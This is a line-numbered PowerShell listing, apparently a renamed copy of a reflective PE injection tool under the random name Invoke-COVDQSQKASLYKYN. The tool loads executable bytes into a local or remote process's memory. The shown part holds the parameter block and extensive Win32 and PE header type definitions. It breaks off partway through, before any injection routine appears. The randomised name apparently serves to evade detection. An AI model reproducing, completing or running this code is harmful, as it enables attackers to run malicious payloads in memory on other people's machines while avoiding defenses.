CAA

1.  
2. function Invoke-COVDQSQKASLYKYN
3. {
4.  
5. [CmdletBinding()]
6. Param(
7.     [Parameter(Position = 0, Mandatory = $true)]
8.     [ValidateNotNullOrEmpty()]
9.     [Byte[]]
10.     $PEBytes,
11.  
12.     [Parameter(Position = 1)]
13.     [String[]]
14.     $ComputerName,
15.  
16.     [Parameter(Position = 2)]
17.     [ValidateSet( 'WString', 'String', 'Void' )]
18.     [String]
19.     $FuncReturnType = 'Void',
20.  
21.     [Parameter(Position = 3)]
22.     [String]
23.     $ExeArgs,
24.  
25.     [Parameter(Position = 4)]
26.     [Int32]
27.     $ProcId,
28.  
29.     [Parameter(Position = 5)]
30.     [String]
31.     $ProcName,
32.  
33.     [Switch]
34.     $ForceASLR,
35.  
36.     [Switch]
37.     $DoNotZeroMZ
38. )
39.  
40. Set-StrictMode -Version 2
41.  
42.  
43. $RemoteScriptBlock = {
44.     [CmdletBinding()]
45.     Param(
46.         [Parameter(Position = 0, Mandatory = $true)]
47.         [Byte[]]
48.         $PEBytes,
49.  
50.         [Parameter(Position = 1, Mandatory = $true)]
51.         [String]
52.         $FuncReturnType,
53.  
54.         [Parameter(Position = 2, Mandatory = $true)]
55.         [Int32]
56.         $ProcId,
57.  
58.         [Parameter(Position = 3, Mandatory = $true)]
59.         [String]
60.         $ProcName,
61.  
62.         [Parameter(Position = 4, Mandatory = $true)]
63.         [Bool]
64.         $ForceASLR
65.     )
66.  
67.     Function Get-Win32Types
68.     {
69.         $Win32Types = New-Object System.Object
70.  
71.         $Domain = [AppDomain]::CurrentDomain
72.         $DynamicAssembly = New-Object System.Reflection.AssemblyName('DynamicAssembly')
73.         $AssemblyBuilder = $Domain.DefineDynamicAssembly($DynamicAssembly, [System.Reflection.Emit.AssemblyBuilderAccess]::Run)
74.         $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('DynamicModule', $false)
75.         $ConstructorInfo = [System.Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]
76.  
77.         $TypeBuilder = $ModuleBuilder.DefineEnum('MachineType', 'Public', [UInt16])
78.         $TypeBuilder.DefineLiteral('Native', [UInt16] 0) | Out-Null
79.         $TypeBuilder.DefineLiteral('I386', [UInt16] 0x014c) | Out-Null
80.         $TypeBuilder.DefineLiteral('Itanium', [UInt16] 0x0200) | Out-Null
81.         $TypeBuilder.DefineLiteral('x64', [UInt16] 0x8664) | Out-Null
82.         $MachineType = $TypeBuilder.CreateType()
83.         $Win32Types | Add-Member -MemberType NoteProperty -Name MachineType -Value $MachineType
84.  
85.  
86.         $TypeBuilder = $ModuleBuilder.DefineEnum('MagicType', 'Public', [UInt16])
87.         $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR32_MAGIC', [UInt16] 0x10b) | Out-Null
88.         $TypeBuilder.DefineLiteral('IMAGE_NT_OPTIONAL_HDR64_MAGIC', [UInt16] 0x20b) | Out-Null
89.         $MagicType = $TypeBuilder.CreateType()
90.         $Win32Types | Add-Member -MemberType NoteProperty -Name MagicType -Value $MagicType
91.  
92.  
93.         $TypeBuilder = $ModuleBuilder.DefineEnum('SubSystemType', 'Public', [UInt16])
94.         $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_UNKNOWN', [UInt16] 0) | Out-Null
95.         $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_NATIVE', [UInt16] 1) | Out-Null
96.         $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_GUI', [UInt16] 2) | Out-Null
97.         $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CUI', [UInt16] 3) | Out-Null
98.         $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_POSIX_CUI', [UInt16] 7) | Out-Null
99.         $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_WINDOWS_CE_GUI', [UInt16] 9) | Out-Null
100.         $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_APPLICATION', [UInt16] 10) | Out-Null
101.         $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_BOOT_SERVICE_DRIVER', [UInt16] 11) | Out-Null
102.         $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_RUNTIME_DRIVER', [UInt16] 12) | Out-Null
103.         $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_EFI_ROM', [UInt16] 13) | Out-Null
104.         $TypeBuilder.DefineLiteral('IMAGE_SUBSYSTEM_XBOX', [UInt16] 14) | Out-Null
105.         $SubSystemType = $TypeBuilder.CreateType()
106.         $Win32Types | Add-Member -MemberType NoteProperty -Name SubSystemType -Value $SubSystemType
107.  
108.  
109.         $TypeBuilder = $ModuleBuilder.DefineEnum('DllCharacteristicsType', 'Public', [UInt16])
110.         $TypeBuilder.DefineLiteral('RES_0', [UInt16] 0x0001) | Out-Null
111.         $TypeBuilder.DefineLiteral('RES_1', [UInt16] 0x0002) | Out-Null
112.         $TypeBuilder.DefineLiteral('RES_2', [UInt16] 0x0004) | Out-Null
113.         $TypeBuilder.DefineLiteral('RES_3', [UInt16] 0x0008) | Out-Null
114.         $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_DYNAMIC_BASE', [UInt16] 0x0040) | Out-Null
115.         $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_FORCE_INTEGRITY', [UInt16] 0x0080) | Out-Null
116.         $TypeBuilder.DefineLiteral('IMAGE_DLL_CHARACTERISTICS_NX_COMPAT', [UInt16] 0x0100) | Out-Null
117.         $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_ISOLATION', [UInt16] 0x0200) | Out-Null
118.         $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_SEH', [UInt16] 0x0400) | Out-Null
119.         $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_NO_BIND', [UInt16] 0x0800) | Out-Null
120.         $TypeBuilder.DefineLiteral('RES_4', [UInt16] 0x1000) | Out-Null
121.         $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_WDM_DRIVER', [UInt16] 0x2000) | Out-Null
122.         $TypeBuilder.DefineLiteral('IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE', [UInt16] 0x8000) | Out-Null
123.         $DllCharacteristicsType = $TypeBuilder.CreateType()
124.         $Win32Types | Add-Member -MemberType NoteProperty -Name DllCharacteristicsType -Value $DllCharacteristicsType
125.  
126.  
127.  
128.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
129.         $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DATA_DIRECTORY', $Attributes, [System.ValueType], 8)
130.         ($TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public')).SetOffset(0) | Out-Null
131.         ($TypeBuilder.DefineField('Size', [UInt32], 'Public')).SetOffset(4) | Out-Null
132.         $IMAGE_DATA_DIRECTORY = $TypeBuilder.CreateType()
133.         $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DATA_DIRECTORY -Value $IMAGE_DATA_DIRECTORY
134.  
135.  
136.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
137.         $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_FILE_HEADER', $Attributes, [System.ValueType], 20)
138.         $TypeBuilder.DefineField('Machine', [UInt16], 'Public') | Out-Null
139.         $TypeBuilder.DefineField('NumberOfSections', [UInt16], 'Public') | Out-Null
140.         $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
141.         $TypeBuilder.DefineField('PointerToSymbolTable', [UInt32], 'Public') | Out-Null
142.         $TypeBuilder.DefineField('NumberOfSymbols', [UInt32], 'Public') | Out-Null
143.         $TypeBuilder.DefineField('SizeOfOptionalHeader', [UInt16], 'Public') | Out-Null
144.         $TypeBuilder.DefineField('Characteristics', [UInt16], 'Public') | Out-Null
145.         $IMAGE_FILE_HEADER = $TypeBuilder.CreateType()
146.         $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_FILE_HEADER -Value $IMAGE_FILE_HEADER
147.  
148.  
149.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
150.         $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER64', $Attributes, [System.ValueType], 240)
151.         ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
152.         ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
153.         ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
154.         ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
155.         ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
156.         ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
157.         ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
158.         ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
159.         ($TypeBuilder.DefineField('ImageBase', [UInt64], 'Public')).SetOffset(24) | Out-Null
160.         ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
161.         ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
162.         ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
163.         ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
164.         ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
165.         ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
166.         ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
167.         ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
168.         ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
169.         ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
170.         ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
171.         ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
172.         ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
173.         ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
174.         ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt64], 'Public')).SetOffset(72) | Out-Null
175.         ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt64], 'Public')).SetOffset(80) | Out-Null
176.         ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt64], 'Public')).SetOffset(88) | Out-Null
177.         ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt64], 'Public')).SetOffset(96) | Out-Null
178.         ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(104) | Out-Null
179.         ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(108) | Out-Null
180.         ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
181.         ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
182.         ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
183.         ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
184.         ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
185.         ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
186.         ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
187.         ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
188.         ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
189.         ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
190.         ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
191.         ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
192.         ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
193.         ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
194.         ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(224) | Out-Null
195.         ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(232) | Out-Null
196.         $IMAGE_OPTIONAL_HEADER64 = $TypeBuilder.CreateType()
197.         $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER64 -Value $IMAGE_OPTIONAL_HEADER64
198.  
199.  
200.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, ExplicitLayout, Sealed, BeforeFieldInit'
201.         $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_OPTIONAL_HEADER32', $Attributes, [System.ValueType], 224)
202.         ($TypeBuilder.DefineField('Magic', $MagicType, 'Public')).SetOffset(0) | Out-Null
203.         ($TypeBuilder.DefineField('MajorLinkerVersion', [Byte], 'Public')).SetOffset(2) | Out-Null
204.         ($TypeBuilder.DefineField('MinorLinkerVersion', [Byte], 'Public')).SetOffset(3) | Out-Null
205.         ($TypeBuilder.DefineField('SizeOfCode', [UInt32], 'Public')).SetOffset(4) | Out-Null
206.         ($TypeBuilder.DefineField('SizeOfInitializedData', [UInt32], 'Public')).SetOffset(8) | Out-Null
207.         ($TypeBuilder.DefineField('SizeOfUninitializedData', [UInt32], 'Public')).SetOffset(12) | Out-Null
208.         ($TypeBuilder.DefineField('AddressOfEntryPoint', [UInt32], 'Public')).SetOffset(16) | Out-Null
209.         ($TypeBuilder.DefineField('BaseOfCode', [UInt32], 'Public')).SetOffset(20) | Out-Null
210.         ($TypeBuilder.DefineField('BaseOfData', [UInt32], 'Public')).SetOffset(24) | Out-Null
211.         ($TypeBuilder.DefineField('ImageBase', [UInt32], 'Public')).SetOffset(28) | Out-Null
212.         ($TypeBuilder.DefineField('SectionAlignment', [UInt32], 'Public')).SetOffset(32) | Out-Null
213.         ($TypeBuilder.DefineField('FileAlignment', [UInt32], 'Public')).SetOffset(36) | Out-Null
214.         ($TypeBuilder.DefineField('MajorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(40) | Out-Null
215.         ($TypeBuilder.DefineField('MinorOperatingSystemVersion', [UInt16], 'Public')).SetOffset(42) | Out-Null
216.         ($TypeBuilder.DefineField('MajorImageVersion', [UInt16], 'Public')).SetOffset(44) | Out-Null
217.         ($TypeBuilder.DefineField('MinorImageVersion', [UInt16], 'Public')).SetOffset(46) | Out-Null
218.         ($TypeBuilder.DefineField('MajorSubsystemVersion', [UInt16], 'Public')).SetOffset(48) | Out-Null
219.         ($TypeBuilder.DefineField('MinorSubsystemVersion', [UInt16], 'Public')).SetOffset(50) | Out-Null
220.         ($TypeBuilder.DefineField('Win32VersionValue', [UInt32], 'Public')).SetOffset(52) | Out-Null
221.         ($TypeBuilder.DefineField('SizeOfImage', [UInt32], 'Public')).SetOffset(56) | Out-Null
222.         ($TypeBuilder.DefineField('SizeOfHeaders', [UInt32], 'Public')).SetOffset(60) | Out-Null
223.         ($TypeBuilder.DefineField('CheckSum', [UInt32], 'Public')).SetOffset(64) | Out-Null
224.         ($TypeBuilder.DefineField('Subsystem', $SubSystemType, 'Public')).SetOffset(68) | Out-Null
225.         ($TypeBuilder.DefineField('DllCharacteristics', $DllCharacteristicsType, 'Public')).SetOffset(70) | Out-Null
226.         ($TypeBuilder.DefineField('SizeOfStackReserve', [UInt32], 'Public')).SetOffset(72) | Out-Null
227.         ($TypeBuilder.DefineField('SizeOfStackCommit', [UInt32], 'Public')).SetOffset(76) | Out-Null
228.         ($TypeBuilder.DefineField('SizeOfHeapReserve', [UInt32], 'Public')).SetOffset(80) | Out-Null
229.         ($TypeBuilder.DefineField('SizeOfHeapCommit', [UInt32], 'Public')).SetOffset(84) | Out-Null
230.         ($TypeBuilder.DefineField('LoaderFlags', [UInt32], 'Public')).SetOffset(88) | Out-Null
231.         ($TypeBuilder.DefineField('NumberOfRvaAndSizes', [UInt32], 'Public')).SetOffset(92) | Out-Null
232.         ($TypeBuilder.DefineField('ExportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(96) | Out-Null
233.         ($TypeBuilder.DefineField('ImportTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(104) | Out-Null
234.         ($TypeBuilder.DefineField('ResourceTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(112) | Out-Null
235.         ($TypeBuilder.DefineField('ExceptionTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(120) | Out-Null
236.         ($TypeBuilder.DefineField('CertificateTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(128) | Out-Null
237.         ($TypeBuilder.DefineField('BaseRelocationTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(136) | Out-Null
238.         ($TypeBuilder.DefineField('Debug', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(144) | Out-Null
239.         ($TypeBuilder.DefineField('Architecture', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(152) | Out-Null
240.         ($TypeBuilder.DefineField('GlobalPtr', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(160) | Out-Null
241.         ($TypeBuilder.DefineField('TLSTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(168) | Out-Null
242.         ($TypeBuilder.DefineField('LoadConfigTable', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(176) | Out-Null
243.         ($TypeBuilder.DefineField('BoundImport', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(184) | Out-Null
244.         ($TypeBuilder.DefineField('IAT', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(192) | Out-Null
245.         ($TypeBuilder.DefineField('DelayImportDescriptor', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(200) | Out-Null
246.         ($TypeBuilder.DefineField('CLRRuntimeHeader', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(208) | Out-Null
247.         ($TypeBuilder.DefineField('Reserved', $IMAGE_DATA_DIRECTORY, 'Public')).SetOffset(216) | Out-Null
248.         $IMAGE_OPTIONAL_HEADER32 = $TypeBuilder.CreateType()
249.         $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_OPTIONAL_HEADER32 -Value $IMAGE_OPTIONAL_HEADER32
250.  
251.  
252.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
253.         $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS64', $Attributes, [System.ValueType], 264)
254.         $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
255.         $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
256.         $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER64, 'Public') | Out-Null
257.         $IMAGE_NT_HEADERS64 = $TypeBuilder.CreateType()
258.         $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS64 -Value $IMAGE_NT_HEADERS64
259.  
260.  
261.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
262.         $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_NT_HEADERS32', $Attributes, [System.ValueType], 248)
263.         $TypeBuilder.DefineField('Signature', [UInt32], 'Public') | Out-Null
264.         $TypeBuilder.DefineField('FileHeader', $IMAGE_FILE_HEADER, 'Public') | Out-Null
265.         $TypeBuilder.DefineField('OptionalHeader', $IMAGE_OPTIONAL_HEADER32, 'Public') | Out-Null
266.         $IMAGE_NT_HEADERS32 = $TypeBuilder.CreateType()
267.         $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_NT_HEADERS32 -Value $IMAGE_NT_HEADERS32
268.  
269.  
270.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
271.         $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_DOS_HEADER', $Attributes, [System.ValueType], 64)
272.         $TypeBuilder.DefineField('e_magic', [UInt16], 'Public') | Out-Null
273.         $TypeBuilder.DefineField('e_cblp', [UInt16], 'Public') | Out-Null
274.         $TypeBuilder.DefineField('e_cp', [UInt16], 'Public') | Out-Null
275.         $TypeBuilder.DefineField('e_crlc', [UInt16], 'Public') | Out-Null
276.         $TypeBuilder.DefineField('e_cparhdr', [UInt16], 'Public') | Out-Null
277.         $TypeBuilder.DefineField('e_minalloc', [UInt16], 'Public') | Out-Null
278.         $TypeBuilder.DefineField('e_maxalloc', [UInt16], 'Public') | Out-Null
279.         $TypeBuilder.DefineField('e_ss', [UInt16], 'Public') | Out-Null
280.         $TypeBuilder.DefineField('e_sp', [UInt16], 'Public') | Out-Null
281.         $TypeBuilder.DefineField('e_csum', [UInt16], 'Public') | Out-Null
282.         $TypeBuilder.DefineField('e_ip', [UInt16], 'Public') | Out-Null
283.         $TypeBuilder.DefineField('e_cs', [UInt16], 'Public') | Out-Null
284.         $TypeBuilder.DefineField('e_lfarlc', [UInt16], 'Public') | Out-Null
285.         $TypeBuilder.DefineField('e_ovno', [UInt16], 'Public') | Out-Null
286.  
287.         $e_resField = $TypeBuilder.DefineField('e_res', [UInt16[]], 'Public, HasFieldMarshal')
288.         $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
289.         $FieldArray = @([System.Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))
290.         $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 4))
291.         $e_resField.SetCustomAttribute($AttribBuilder)
292.  
293.         $TypeBuilder.DefineField('e_oemid', [UInt16], 'Public') | Out-Null
294.         $TypeBuilder.DefineField('e_oeminfo', [UInt16], 'Public') | Out-Null
295.  
296.         $e_res2Field = $TypeBuilder.DefineField('e_res2', [UInt16[]], 'Public, HasFieldMarshal')
297.         $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
298.         $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 10))
299.         $e_res2Field.SetCustomAttribute($AttribBuilder)
300.  
301.         $TypeBuilder.DefineField('e_lfanew', [Int32], 'Public') | Out-Null
302.         $IMAGE_DOS_HEADER = $TypeBuilder.CreateType()
303.         $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_DOS_HEADER -Value $IMAGE_DOS_HEADER
304.  
305.  
306.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
307.         $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_SECTION_HEADER', $Attributes, [System.ValueType], 40)
308.  
309.         $nameField = $TypeBuilder.DefineField('Name', [Char[]], 'Public, HasFieldMarshal')
310.         $ConstructorValue = [System.Runtime.InteropServices.UnmanagedType]::ByValArray
311.         $AttribBuilder = New-Object System.Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 8))
312.         $nameField.SetCustomAttribute($AttribBuilder)
313.  
314.         $TypeBuilder.DefineField('VirtualSize', [UInt32], 'Public') | Out-Null
315.         $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
316.         $TypeBuilder.DefineField('SizeOfRawData', [UInt32], 'Public') | Out-Null
317.         $TypeBuilder.DefineField('PointerToRawData', [UInt32], 'Public') | Out-Null
318.         $TypeBuilder.DefineField('PointerToRelocations', [UInt32], 'Public') | Out-Null
319.         $TypeBuilder.DefineField('PointerToLinenumbers', [UInt32], 'Public') | Out-Null
320.         $TypeBuilder.DefineField('NumberOfRelocations', [UInt16], 'Public') | Out-Null
321.         $TypeBuilder.DefineField('NumberOfLinenumbers', [UInt16], 'Public') | Out-Null
322.         $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
323.         $IMAGE_SECTION_HEADER = $TypeBuilder.CreateType()
324.         $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_SECTION_HEADER -Value $IMAGE_SECTION_HEADER
325.  
326.  
327.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
328.         $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_BASE_RELOCATION', $Attributes, [System.ValueType], 8)
329.         $TypeBuilder.DefineField('VirtualAddress', [UInt32], 'Public') | Out-Null
330.         $TypeBuilder.DefineField('SizeOfBlock', [UInt32], 'Public') | Out-Null
331.         $IMAGE_BASE_RELOCATION = $TypeBuilder.CreateType()
332.         $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_BASE_RELOCATION -Value $IMAGE_BASE_RELOCATION
333.  
334.  
335.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
336.         $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_IMPORT_DESCRIPTOR', $Attributes, [System.ValueType], 20)
337.         $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
338.         $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
339.         $TypeBuilder.DefineField('ForwarderChain', [UInt32], 'Public') | Out-Null
340.         $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
341.         $TypeBuilder.DefineField('FirstThunk', [UInt32], 'Public') | Out-Null
342.         $IMAGE_IMPORT_DESCRIPTOR = $TypeBuilder.CreateType()
343.         $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_IMPORT_DESCRIPTOR -Value $IMAGE_IMPORT_DESCRIPTOR
344.  
345.  
346.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
347.         $TypeBuilder = $ModuleBuilder.DefineType('IMAGE_EXPORT_DIRECTORY', $Attributes, [System.ValueType], 40)
348.         $TypeBuilder.DefineField('Characteristics', [UInt32], 'Public') | Out-Null
349.         $TypeBuilder.DefineField('TimeDateStamp', [UInt32], 'Public') | Out-Null
350.         $TypeBuilder.DefineField('MajorVersion', [UInt16], 'Public') | Out-Null
351.         $TypeBuilder.DefineField('MinorVersion', [UInt16], 'Public') | Out-Null
352.         $TypeBuilder.DefineField('Name', [UInt32], 'Public') | Out-Null
353.         $TypeBuilder.DefineField('Base', [UInt32], 'Public') | Out-Null
354.         $TypeBuilder.DefineField('NumberOfFunctions', [UInt32], 'Public') | Out-Null
355.         $TypeBuilder.DefineField('NumberOfNames', [UInt32], 'Public') | Out-Null
356.         $TypeBuilder.DefineField('AddressOfFunctions', [UInt32], 'Public') | Out-Null
357.         $TypeBuilder.DefineField('AddressOfNames', [UInt32], 'Public') | Out-Null
358.         $TypeBuilder.DefineField('AddressOfNameOrdinals', [UInt32], 'Public') | Out-Null
359.         $IMAGE_EXPORT_DIRECTORY = $TypeBuilder.CreateType()
360.         $Win32Types | Add-Member -MemberType NoteProperty -Name IMAGE_EXPORT_DIRECTORY -Value $IMAGE_EXPORT_DIRECTORY
361.  
362.  
363.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
364.         $TypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType], 8)
365.         $TypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null
366.         $TypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null
367.         $LUID = $TypeBuilder.CreateType()
368.         $Win32Types | Add-Member -MemberType NoteProperty -Name LUID -Value $LUID
369.  
370.  
371.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
372.         $TypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType], 12)
373.         $TypeBuilder.DefineField('Luid', $LUID, 'Public') | Out-Null
374.         $TypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null
375.         $LUID_AND_ATTRIBUTES = $TypeBuilder.CreateType()
376.         $Win32Types | Add-Member -MemberType NoteProperty -Name LUID_AND_ATTRIBUTES -Value $LUID_AND_ATTRIBUTES
377.  
378.  
379.         $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'
